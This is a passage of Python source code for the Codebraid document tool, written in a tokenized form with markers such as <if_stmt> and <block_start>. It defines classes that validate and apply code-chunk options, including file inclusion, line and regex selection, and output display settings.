include_options<if>k<in>self._range_keywords)<if_stmt>((range_keywords<and>(start_keywords<or>end_keywords))<or>len(range_keywords)<g>1<or>len(start_keywords)<g>1<or>len(end_keywords)<g>1)<block_start>conflicting_keys=', '.join("{0}".format(k)<for>k include_options<if>k<in>self._selection_keywords)<line_sep>code_chunk.source_errors.append('Too many keywords for selecting part of an "include" file: {0}'.format(conflicting_keys))<block_end>file=include_options.get('file' <none>)<line_sep>encoding=include_options.get('encoding' 'utf8')<if_stmt>file<is><none><block_start>code_chunk.source_errors.append('Missing "include" keyword "file"')<block_end><if_stmt>code_chunk.source_errors<block_start><return><block_end>file_path=pathlib.Path(file).expanduser()<try_stmt><block_start>text=file_path.read_text(encoding=encoding)<block_end><except_stmt>FileNotFoundError<block_start>code_chunk.source_errors.append('Cannot include nonexistent file "{0}"'.format(file))<block_end><except_stmt>LookupError<block_start>code_chunk.source_errors.append('Unknown encoding "{0}"'.format(encoding))<block_end><except_stmt>PermissionError<block_start>code_chunk.source_errors.append('Insufficient permissions to access file "{0}"'.format(file))<block_end><except_stmt>UnicodeDecodeError<block_start>code_chunk.source_errors.append('Cannot decode file "{0}" with encoding "{1}"'.format(file encoding))<block_end><if_stmt>code_chunk.source_errors<block_start><return><block_end>selection_keywords=start_keywords+end_keywords+range_keywords<if_stmt>selection_keywords<block_start><for_stmt>kw selection_keywords<block_start>text=getattr(self '_option_'+kw)(include_options[kw] text)<if_stmt>code_chunk.source_errors<block_start><return><block_end><block_end><block_end>code_lines=util.splitlines_lf(text)<line_sep>self.code_lines=code_lines<line_sep>self.update(include_options)<block_end>keywords=set(['file' 'encoding' 'lines' 'regex' 'start_string' 'start_regex' 'after_string' 'after_regex' 'before_string' 
'before_regex' 'end_string' 'end_regex'])<line_sep>_start_keywords=set(['start_string' 'start_regex' 'after_string' 'after_regex'])<line_sep>_end_keywords=set(['before_string' 'before_regex' 'end_string' 'end_regex'])<line_sep>_range_keywords=set(['lines' 'regex'])<line_sep>_selection_keywords=_start_keywords|_end_keywords|_range_keywords<def_stmt>_option_lines self value text pattern_re=re.compile(r'{n}(?:-(?:{n})?)?(?:,{n}(?:-(?:{n})?)?)*\Z'.format(n='[1-9][0-9]*'))<block_start>value=value.replace(' ' '')<if_stmt><not>pattern_re.match(value)<block_start>self.code_chunk.source_errors.append('Invalid value for "include" option "lines"')<line_sep><return><block_end>max_line_number=text.count('\n')<if_stmt>text[-1:]<ne>'\n'<block_start>max_line_number<augadd>1<block_end>include_line_indices=set()<for_stmt>line_range value.split(',')<block_start><if_stmt>'-'<not><in>line_range<block_start>include_line_indices.add(int(line_range)-1)<block_end><else_stmt><block_start>start,end=line_range.split('-')<line_sep>start=int(start)-1<line_sep>end=int(end)<if>end<else>max_line_number<line_sep>include_line_indices.update(range(start end))<block_end><block_end>text_lines=util.splitlines_lf(text)<line_sep><return>'\n'.join(text_lines[n]<for>n sorted(include_line_indices))<block_end><def_stmt>_option_regex self value text<block_start><try_stmt><block_start>pattern_re=re.compile(value re.MULTILINE|re.DOTALL)<block_end><except_stmt>re.error<block_start>self.code_chunk.source_errors.append('Invalid regex pattern for "include" option "regex"')<line_sep><return><block_end>match=pattern_re.search(text)<if_stmt>match<is><none><block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "regex" was not found')<line_sep><return><block_end><return>match.group()<block_end><def_stmt>_option_start_string self value text<block_start>index=text.find(value)<if_stmt>index<l>0<block_start>self.code_chunk.source_errors.append('The pattern given by "include" option 
"start_string" was not found')<line_sep><return><block_end><return>text[index:]<block_end><def_stmt>_option_start_regex self value text<block_start><try_stmt><block_start>pattern_re=re.compile(value re.MULTILINE|re.DOTALL)<block_end><except_stmt>re.error<block_start>self.code_chunk.source_errors.append('Invalid regex pattern for "include" option "start_regex"')<line_sep><return><block_end>match=pattern_re.search(text)<if_stmt>match<is><none><block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "start_regex" was not found')<line_sep><return><block_end><return>text[match.start():]<block_end><def_stmt>_option_after_string self value text<block_start>index=text.find(value)<if_stmt>index<l>0<block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "after_string" was not found')<line_sep><return><block_end><return>text[index+len(value):]<block_end><def_stmt>_option_after_regex self value text<block_start><try_stmt><block_start>pattern_re=re.compile(value re.MULTILINE|re.DOTALL)<block_end><except_stmt>re.error<block_start>self.code_chunk.source_errors.append('Invalid regex pattern for "include" option "after_regex"')<line_sep><return><block_end>match=pattern_re.search(text)<if_stmt>match<is><none><block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "after_regex" was not found')<line_sep><return><block_end><return>text[match.end():]<block_end><def_stmt>_option_before_string self value text<block_start>index=text.find(value)<if_stmt>index<l>0<block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "before_string" was not found')<line_sep><return><block_end><return>text[:index]<block_end><def_stmt>_option_before_regex self value text<block_start><try_stmt><block_start>pattern_re=re.compile(value re.MULTILINE|re.DOTALL)<block_end><except_stmt>re.error<block_start>self.code_chunk.source_errors.append('Invalid regex pattern for "include" option 
"before_regex"')<line_sep><return><block_end>match=pattern_re.search(text)<if_stmt>match<is><none><block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "before_regex" was not found')<line_sep><return><block_end><return>text[:match.start()]<block_end><def_stmt>_option_end_string self value text<block_start>index=text.find(value)<if_stmt>index<l>0<block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "end_string" was not found')<line_sep><return><block_end><return>text[:index+len(value)]<block_end><def_stmt>_option_end_regex self value text<block_start><try_stmt><block_start>pattern_re=re.compile(value re.MULTILINE|re.DOTALL)<block_end><except_stmt>re.error<block_start>self.code_chunk.source_errors.append('Invalid regex pattern for "include" option "end_regex"')<line_sep><return><block_end>match=pattern_re.search(text)<if_stmt>match<is><none><block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "end_regex" was not found')<line_sep><return><block_end><return>text[:match.end()]<block_end><block_end><class_stmt>Options(dict)<block_start>''' Store code chunk options. Also modify the code chunk as necessary based on the options. Option processing methods check options for validity and process them, but do not perform any type conversions. Any desired type conversions must be performed in format-specific subclasses of CodeChunk, which can take into account the data types that a given document format allows for options. Subclasses must also handle duplicate options, since at this point options must have been reduced to a dict. The effect of all options is independent of their order. When two options would have an order-dependent effect, only one of them is permitted at a time. Invalid options related to presentation result in warnings, while invalid options related to code execution result in errors. 
When possible, option processing proceeds even after an error, to give a more complete error message. There are two approaches to handling errors: Stop all code execution, or stop all code execution related to the error. The latter approach is currently taken. Processing as many options as possible makes it easier to determine which code execution is related to an error. For example, if the session option is processed for a code chunk with an error, then only that session can be disabled, instead of the entire language related to the error. '''<def_stmt>__init__ self code_chunk custom_options<block_start>self.code_chunk=code_chunk<if_stmt>code_chunk.inline<block_start>self.update(self._default_inline_options)<block_end><else_stmt><block_start>self.update(self._default_block_options)<block_end><if_stmt>code_chunk.execute<block_start>self['session']=<none><block_end><else_stmt><block_start>self['source']=<none><block_end>self['first_chunk_options']={}<if_stmt>any(k<not><in>self.keywords<for>k custom_options)<block_start>unknown_keys=', '.join('"{0}"'.format(k)<for>k custom_options<if>k<not><in>self.keywords)<line_sep># Raise an error for unknown options. There is no way to tell # whether an execution or presentation option was intended, so # take the safer approach. code_chunk.source_errors.append('Unknown keywords: {0}'.format(unknown_keys))<line_sep># Treat received `custom_options` as immutable custom_options={k:v<for>k,v custom_options.items()<if>k<in>self.keywords}<block_end>self.custom_options=custom_options<for_stmt>k,v custom_options.items()<block_start><if_stmt>k<not><in>self._after_copy_keywords<block_start>getattr(self '_option_'+k)(k v)<block_end><block_end><if_stmt><not>code_chunk.source_errors<and>'copy'<not><in>self# Only handle 'show' and 'hide' if there are no errors so far and # there is not a pending 'copy', which for some commands might # change `.is_expr` or the defaults for 'show'. If there are # errors, 'show' and 'hide' are never used. 
<block_start><if_stmt>code_chunk.inline<block_start>self['show']=self._default_inline_show[code_chunk.command].copy()<block_end><else_stmt><block_start>self['show']=self._default_block_show[code_chunk.command].copy()<block_end><for_stmt>k,v custom_options.items()<block_start><if_stmt>k<in>self._after_copy_keywords<block_start>getattr(self '_option_'+k)(k v)<block_end><block_end><block_end><block_end><def_stmt>finalize_after_copy self<block_start>''' Complete any option processing that must wait until after copying. For the paste command, 'show' can be inherited. For paste and code, `.is_expr` can be inherited. 'lang' can also be inherited. '''<line_sep>code_chunk=self.code_chunk<line_sep>custom_options=self.custom_options<if_stmt>self['lang']<is><none><block_start>self['lang']=code_chunk.copy_chunks[0].options['lang']<block_end><if_stmt>code_chunk.inline<block_start><if_stmt>code_chunk.command<eq>'paste'<and>'show'<not><in>custom_options<block_start>self['show']=code_chunk.copy_chunks[0].options['show'].copy()# Inherit <block_end><else_stmt><block_start>self['show']=self._default_inline_show[code_chunk.command].copy()<block_end><block_end><else_stmt><block_start><if_stmt>code_chunk.command<eq>'paste'<and>'show'<not><in>custom_options<block_start>self['show']=code_chunk.copy_chunks[0].options['show'].copy()# Inherit <block_end><else_stmt><block_start>self['show']=self._default_block_show[code_chunk.command].copy()<block_end><block_end><for_stmt>key self._after_copy_keywords<block_start><if_stmt>key<in>custom_options<block_start>getattr(self '_option_'+key)(key custom_options[key])<block_end><block_end><block_end>_base_keywords=set(['complete' 'copy' 'example' 'hide' 'hide_markup_keys' 'include' 'lang' 'name' 'outside_main' 'session' 'source' 'show'])<line_sep>_layout_keywords=set(['{0}_{1}'.format(dsp kw)<if>dsp<else>kw<for>dsp ('' 'markup' 'copied_markup' 'code' 'stdout' 'stderr')<for>kw ('first_number' 'line_numbers' 'rewrap_lines' 'rewrap_width' 'expand_tabs' 
'tab_size')])<line_sep>_first_chunk_execute_keywords=set(['executable' 'jupyter_kernel'])<line_sep>_first_chunk_save_keywords=set(['save' 'save_as'])<line_sep>_first_chunk_other_keywords=set(['jupyter_timeout' 'live_output'])<line_sep>_first_chunk_keywords=_first_chunk_execute_keywords|_first_chunk_save_keywords|_first_chunk_other_keywords<line_sep>keywords=_base_keywords|_layout_keywords|_first_chunk_keywords<line_sep>_after_copy_keywords=set(['hide' 'show'])<line_sep># Default values for show and session/source are inserted later based on # command and inline status _default_inline_options={'complete':<true> 'example':<false> 'lang':<none> 'outside_main':<false>}<line_sep>_default_block_options=_default_inline_options.copy()<line_sep>_default_block_options.update({'code_first_number':'next' 'code_line_numbers':<true>})<line_sep># The defaultdict handles unknown commands that are represented as None _default_rich_output='latex|markdown|png|jpg|plain'.split('|')<line_sep>_default_inline_show=collections.defaultdict(<lambda>:ODict() # Unknown -> show nothing {'code':ODict([('code' 'verbatim')]) 'expr':ODict([('expr' 'raw') ('stderr' 'verbatim')]) # expr and rich_output don't clash, because expr is only present # with the built-in code execution system, while rich_output # requires a Jupyter kernel. If the built-in system gains # rich_output capabilities or there are other related changes, # this may need refactoring. 
'nb':ODict([('expr' 'verbatim') ('rich_output' _default_rich_output) ('stderr' 'verbatim')]) 'paste':ODict() 'run':ODict([('stdout' 'raw') ('stderr' 'verbatim') ('rich_output' _default_rich_output)])})<line_sep>_default_block_show=collections.defaultdict(<lambda>:ODict() # Unknown -> show nothing {'code':ODict([('code' 'verbatim')]) 'nb':ODict([('code' 'verbatim') ('stdout' 'verbatim') ('stderr' 'verbatim') ('rich_output' _default_rich_output)]) 'paste':ODict() 'repl':ODict([('repl' 'verbatim')]) 'run':ODict([('stdout' 'raw') ('stderr' 'verbatim') ('rich_output' _default_rich_output)])})<def_stmt>_option_bool_warning self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_bool_error self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_str_warning self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_str_error self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_positive_int_warning self key value<block_start><if_stmt><not>isinstance(value int)<or>value<le>0<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_positive_int_error self key 
value<block_start><if_stmt><not>isinstance(value int)<or>value<le>0<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_first_chunk_bool_error self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self['first_chunk_options'][key]=value<block_end><block_end><def_stmt>_option_first_chunk_string_error self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>first_chunk_options=self['first_chunk_options']<if_stmt>(key<in>self._first_chunk_execute_keywords<and>any(k<in>first_chunk_options<for>k self._first_chunk_execute_keywords))<block_start>conflicting_options=', '.join('"{0}"'.format(k)<for>k self._first_chunk_execute_keywords<if>k<in>first_chunk_options)<line_sep>self.code_chunk.source_errors.append('Conflicting options: {0}'.format(conflicting_options))<block_end><else_stmt><block_start>first_chunk_options[key]=value<block_end><block_end><block_end><def_stmt>_option_first_chunk_int_warning self key value<block_start><if_stmt><not>isinstance(value int)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key 
value))<block_end><else_stmt><block_start>self['first_chunk_options'][key]=value<block_end><block_end>_option_executable=_option_first_chunk_string_error<line_sep>_option_jupyter_kernel=_option_first_chunk_string_error<line_sep>_option_jupyter_timeout=_option_first_chunk_int_warning<line_sep>_option_save=_option_first_chunk_bool_error<line_sep>_option_save_as=_option_first_chunk_string_error<line_sep>_option_live_output=_option_first_chunk_bool_error<line_sep>_option_example=_option_bool_warning<line_sep>_option_lang=_option_str_error<def_stmt>_option_complete self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt><not>self.code_chunk.execute<block_start>self.code_chunk.source_errors.append('Option "complete" is only compatible with executed code chunks')<block_end><elif_stmt>self.code_chunk.command<eq>'repl'<block_start>self.code_chunk.source_errors.append('Option "complete" is not compatible with "repl" command')<block_end><elif_stmt>self.code_chunk.is_expr<and><not>value<block_start>self.code_chunk.source_errors.append('Option "complete" value "false" is incompatible with expr command')<block_end><elif_stmt>self['outside_main']# Technically, this is only required for complete=true, but # prohibiting it in all cases is more consistent <block_start>self.code_chunk.source_errors.append('Option "complete" is incompatible with "outside_main" value "true"')<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_copy self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt>'include'<in>self<block_start>self.code_chunk.source_errors.append('Option "copy" is incompatible with "include"')<block_end><else_stmt># Since non-identifier code chunk names can't be defined, there's # no need to check 
for identifier-style names here <block_start>self[key]=[x.strip()<for>x value.split('+')]<block_end><block_end><def_stmt>_option_expand_tabs self key value<block_start><if_stmt>key<eq>'expand_tabs'<block_start>key='code_expand_tabs'<block_end>self._option_bool_warning(key value)<block_end>_option_markup_expand_tabs=_option_expand_tabs<line_sep>_option_copied_markup_expand_tabs=_option_expand_tabs<line_sep>_option_code_expand_tabs=_option_expand_tabs<line_sep>_option_stdout_expand_tabs=_option_expand_tabs<line_sep>_option_stderr_expand_tabs=_option_expand_tabs<def_stmt>_option_first_number self key value<block_start><if_stmt><not>((isinstance(value int)<and>value<g>0)<or>(isinstance(value str)<and>value<eq>'next'))<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start><if_stmt>key<eq>'first_number'<block_start>key='code_first_number'<block_end>self[key]=value<block_end><block_end>_option_markup_first_number=_option_first_number<line_sep>_option_copied_markup_first_number=_option_first_number<line_sep>_option_code_first_number=_option_first_number<line_sep>_option_stdout_first_number=_option_first_number<line_sep>_option_stderr_first_number=_option_first_number<def_stmt>_option_rewrap_lines self key value<block_start><if_stmt>key<eq>'rewrap_lines'<block_start>key='code_rewrap_lines'<block_end>self._option_bool_warning(key value)<block_end>_option_markup_rewrap_lines=_option_rewrap_lines<line_sep>_option_copied_markup_rewrap_lines=_option_rewrap_lines<line_sep>_option_code_rewrap_lines=_option_rewrap_lines<line_sep>_option_stdout_rewrap_lines=_option_rewrap_lines<line_sep>_option_stderr_rewrap_lines=_option_rewrap_lines<def_stmt>_option_rewrap_width self key value<block_start><if_stmt>key<eq>'rewrap_width'<block_start>key='code_rewrap_width'<block_end>self._option_positive_int_warning(key 
value)<block_end>_option_markup_rewrap_width=_option_rewrap_width<line_sep>_option_copied_markup_rewrap_width=_option_rewrap_width<line_sep>_option_code_rewrap_width=_option_rewrap_width<line_sep>_option_stdout_rewrap_width=_option_rewrap_width<line_sep>_option_stderr_rewrap_width=_option_rewrap_width<def_stmt>_option_hide self key value display_values=set(['markup' 'copied_markup' 'code' 'stdout' 'stderr' 'expr' 'rich_output'])# 'hide' may be processed during `finalize_after_copy()` to allow for # 'show' and `.is_expr` inheritance. <block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt>'show'<in>self.custom_options# 'hide' checks for 'show' conflict, so 'show' does not. Check # in `custom_options` since there's a default 'show' in `self`. <block_start>self.code_chunk.source_warnings.append('Option "hide" cannot be used with "show"')<block_end><elif_stmt>value<eq>'all'<block_start>self['show']=ODict()<block_end><else_stmt><block_start>hide_values=value.replace(' ' '').split('+')<if_stmt><not>all(v<in>display_values<for>v hide_values)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start><for_stmt>v hide_values<block_start>self['show'].pop(v <none>)<block_end><block_end><block_end><block_end><def_stmt>_option_hide_markup_keys self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt># No need to check keys for validity; this is a display option. 
<block_start>hide_keys=set(value.replace(' ' '').split('+'))<line_sep>hide_keys.add('hide_markup_keys')<line_sep>self[key]=hide_keys<block_end><block_end><def_stmt>_option_include self key value# Include() does its own value check, so this isn't technically needed <block_start><if_stmt><not>isinstance(value dict)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt>'copy'<in>self<block_start>self.code_chunk.source_errors.append('Option "include" is incompatible with "copy"')<block_end><else_stmt><block_start>include=Include(self.code_chunk value)<if_stmt>include.code_lines<is><not><none><block_start>self[key]=include<block_end><block_end><block_end><def_stmt>_option_line_numbers self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start><if_stmt>key<eq>'line_numbers'<block_start>key='code_line_numbers'<block_end>self[key]=value<block_end><block_end>_option_markup_line_numbers=_option_line_numbers<line_sep>_option_copied_markup_line_numbers=_option_line_numbers<line_sep>_option_code_line_numbers=_option_line_numbers<line_sep>_option_stdout_line_numbers=_option_line_numbers<line_sep>_option_stderr_line_numbers=_option_line_numbers<def_stmt>_option_name self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt><not>value.isidentifier()<block_start>self.code_chunk.source_warnings.append('Option "{0}" has invalid, non-identifier value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_outside_main self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key 
value))<block_end><elif_stmt><not>self.code_chunk.execute<block_start>self.code_chunk.source_errors.append('Option "outside_main" is only compatible with executed code chunks')<block_end><elif_stmt>self.code_chunk.command<eq>'repl'<block_start>self.code_chunk.source_errors.append('Option "outside_main" is not compatible with "repl" command')<block_end><elif_stmt>self.code_chunk.is_expr<and>value<block_start>self.code_chunk.source_errors.append('Option "outside_main" value "true" is incompatible with expr command')<block_end><elif_stmt>value<and>'complete'<in>self.custom_options<block_start>self.code_chunk.source_errors.append('Option "outside_main" value "true" is incompatible with "complete"')<block_end><else_stmt><block_start>self['complete']=<false><line_sep>self[key]=value<block_end><block_end><def_stmt>_option_source self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt>self.code_chunk.execute<and>self.code_chunk.command<is><not><none># Always preserve sources for unknown commands, so that these # sources can be marked as having potential errors later <block_start>self.code_chunk.source_errors.append('Option "source" is only compatible with non-executed code chunks; otherwise, use "session"')<block_end><elif_stmt><not>value.isidentifier()<block_start>self.code_chunk.source_errors.append('Option "{0}" has invalid, non-identifier value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_session self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt><not>self.code_chunk.execute<and>self.code_chunk.command<is><not><none># Always preserve sessions for unknown commands, so that these # sessions can be marked as having potential errors later 
<block_start>self.code_chunk.source_errors.append('Option "session" is only compatible with executed code chunks; otherwise, use "source"')<block_end><elif_stmt><not>value.isidentifier()<block_start>self.code_chunk.source_errors.append('Option "{0}" has invalid, non-identifier value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end>mime_map={'latex':'text/latex' 'html':'text/html' 'markdown':'text/markdown' 'plain':'text/plain' 'png':'image/png' 'jpg':'image/jpeg' 'jpeg':'image/jpeg' 'svg':'image/svg+xml' 'pdf':'application/pdf'}<line_sep>mime_map_with_text_display={}<line_sep>rich_text_default_display={}<for_stmt>k,v mime_map.items()<block_start>mime_map_with_text_display[k]=v<if_stmt>v.startswith('text/')<block_start>mime_map_with_text_display[k+':raw']=v<line_sep>mime_map_with_text_display[k+':verbatim']=v<line_sep>mime_map_with_text_display[k+':verbatim_or_empty']=v<if_stmt>k<eq>'plain'<block_start>rich_text_default_display[k]='verbatim'<block_end><else_stmt><block_start>rich_text_default_display[k]='raw'<block_end><block_end><block_end><def_stmt>_option_show self key value# 'show' may be processed during `finalize_after_copy()` to allow for # 'show' and `.is_expr` inheritance. 'hide' checks for 'show' # conflict, so 'show' does not. 
<block_start><if_stmt><not>(isinstance(value str)<or>value<is><none>)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt>value<in>('none' <none>)<block_start>self[key]=ODict()<block_end><else_stmt><block_start>value_processed=ODict()<for_stmt>output_and_format value.replace(' ' '').split('+')<block_start><if_stmt>':'<not><in>output_and_format<block_start>output=output_and_format<line_sep>format=<none><block_end><else_stmt><block_start>output,format=output_and_format.split(':' 1)<block_end><if_stmt>output<in>value_processed<block_start>self.code_chunk.source_warnings.append('Option "{0}" value "{1}" contains duplicate "{2}"'.format(key value output))<line_sep><continue><block_end><if_stmt>output<in>('markup' 'copied_markup' 'code' 'repl')<block_start><if_stmt>format<is><none><block_start>format='verbatim'<block_end><elif_stmt>format<ne>'verbatim'<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end><if_stmt>output<eq>'copied_markup'<and>'copy'<not><in>self.custom_options<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"; can only be used with "copy"'.format(key output_and_format))<line_sep><continue><block_end><block_end><elif_stmt>output<in>('stdout' 'stderr')<block_start><if_stmt>format<is><none><block_start>format='verbatim'<block_end><elif_stmt>format<not><in>('verbatim' 'verbatim_or_empty' 'raw')<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end><block_end><elif_stmt>output<eq>'expr'<block_start><if_stmt><not>self.code_chunk.is_expr<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end><if_stmt>format<is><none><block_start>format='raw'<block_end><elif_stmt>format<not><in>('verbatim' 
'verbatim_or_empty' 'raw')<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end><block_end><elif_stmt>output<eq>'rich_output'<block_start><if_stmt>format<is><none><block_start>format=self._default_rich_output<block_end><else_stmt><block_start>format=format.split('|')<if_stmt><not>all(fmt<in>self.mime_map_with_text_display<for>fmt format)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end><block_end><block_end><else_stmt><block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end>value_processed[output]=format<block_end>self[key]=value_processed<block_end><block_end><def_stmt>_option_tab_size self key value<block_start><if_stmt>key<eq>'tab_size'<block_start>key='code_tab_size'<block_end>self._option_positive_int_warning(key value)<block_end>_option_markup_tab_size=_option_tab_size<line_sep>_option_copied_markup_tab_size=_option_tab_size<line_sep>_option_code_tab_size=_option_tab_size<line_sep>_option_stdout_tab_size=_option_tab_size<line_sep>_option_stderr_tab_size=_option_tab_size<block_end><class_stmt>CodeChunk(object)<block_start>''' Base class for code chunks. 
'''<def_stmt>__init__ self command:str code:Union[str List[str]] custom_options:dict * source_name:Optional[str]=<none> source_start_line_number:Optional[int]=<none> inline:Optional[bool]=<none><block_start>self.__pre_init__()<if_stmt>command<not><in>self.commands<block_start><if_stmt>command<is><none><block_start>self.source_errors.append('Missing valid Codebraid command')<block_end><else_stmt><block_start>self.source_errors.append('Unknown Codebraid command "{0}"'.format(command))<block_end>self.command=<none><block_end><else_stmt><block_start>self.command=command<block_end><if_stmt>command<eq>'expr'<and><not>inline<block_start>self.source_errors.append('Codebraid command "{0}" is only allowed inline'.format(command))<block_end><if_stmt>command<eq>'repl'<and>inline<block_start>self.source_errors.append('Codebraid command "{0}" is not supported inline'.format(command))<block_end>self.execute=self._default_execute[command]<if_stmt>command<eq>'expr'<or>(inline<and>command<eq>'nb')<block_start>self.is_expr=<true><block_end><else_stmt># For the paste command, or code with 'copy', this value can # change later due to inheritance <block_start>self.is_expr=<false><block_end>self.source_name=source_name<line_sep>self.source_start_line_number=source_start_line_number<line_sep>self.inline=inline<line_sep># Check for len(code_lines) > 1 for inline later self._code=<none><if_stmt>isinstance(code list)<block_start>code_lines=code<block_end><else_stmt><block_start>code_lines=util.splitlines_lf(code)<or>['']<block_end><if_stmt>'copy'<not><in>custom_options<and>'include'<not><in>custom_options<block_start><if_stmt>inline<and>len(code_lines)<g>1<block_start>self.source_errors.append('Inline code cannot be longer that 1 line')<block_end>self.code_lines=code_lines<line_sep>self.placeholder_code_lines=<none><block_end><else_stmt><block_start><if_stmt>inline<block_start><if_stmt>len(code_lines)<g>1<or>code_lines[0]<not><in>('' ' ' '_')<block_start>self.source_errors.append('Invalid 
placeholder code for copy or include (need space or underscore)')<block_end><block_end><elif_stmt>len(code_lines)<g>1<or>code_lines[0].rstrip(' ')<not><in>('' '_')<block_start>self.source_errors.append('Invalid placeholder code for copy or include (need empty, space, or underscore)')<block_end># Copying or including code could result in more than one line of # code in an inline context. That is only an issue if the code is # actually displayed. This is checked later when code is # included/copied. self.placeholder_code_lines=code_lines<line_sep>self.code_lines=<none><block_end>self.options=Options(self custom_options)<if_stmt>'include'<in>self.options<and><not>self.source_errors# Copy over include only if no source errors -- otherwise it isn't # used and 'show' may not exist <block_start>include=self.options['include']<if_stmt>inline<and>'code'<in>self.options['show']<and>len(include.code_lines)<g>1<block_start>self.source_errors.append('Cannot include and then display multiple lines of code in an inline context')<block_end><else_stmt><block_start>self.code_lines=include.code_lines<block_end><block_end><if_stmt>command<eq>'paste'<block_start><if_stmt>'copy'<not><in>custom_options<block_start>self.source_errors.append('Command "paste" cannot be used without specifying a target via "copy"')<block_end>self.has_output=<false><block_end><else_stmt><block_start>self.has_output=<true># Whether need output from copying 
<block_end><if_stmt>'copy'<in>self.options<block_start>self.copy_chunks=[]<block_end><if_stmt>self.execute<block_start>self.session_obj=<none><line_sep>self.session_index=<none><line_sep>self.session_output_index=<none><block_end><else_stmt><block_start>self.source_obj=<none><line_sep>self.source_index=<none><block_end>self.stdout_lines=<none><line_sep>self.stderr_lines=<none><line_sep>self.repl_lines=<none><line_sep>self.rich_output=<none><if_stmt>self.is_expr<block_start>self.expr_lines=<none><block_end>self.markup_start_line_number=<none><line_sep>self.code_start_line_number=<none><line_sep>self.stdout_start_line_number=<none><line_sep>self.stderr_start_line_number=<none><block_end><def_stmt>__pre_init__ self<block_start>''' Create lists of errors and warnings. Subclasses may need to register errors or warnings during preprocessing, before they are ready for `super().__init__()` '''<if_stmt><not>hasattr(self 'source_errors')<block_start>self.source_errors=[]<line_sep>self.runtime_source_error=<false><line_sep>self.source_warnings=[]<block_end><block_end>commands=set(['code' 'expr' 'nb' 'paste' 'repl' 'run'])<line_sep>_default_execute=collections.defaultdict(<lambda>:<false> # Unknown command -> do not run {k:<true><for>k ('expr' 'nb' 'repl' 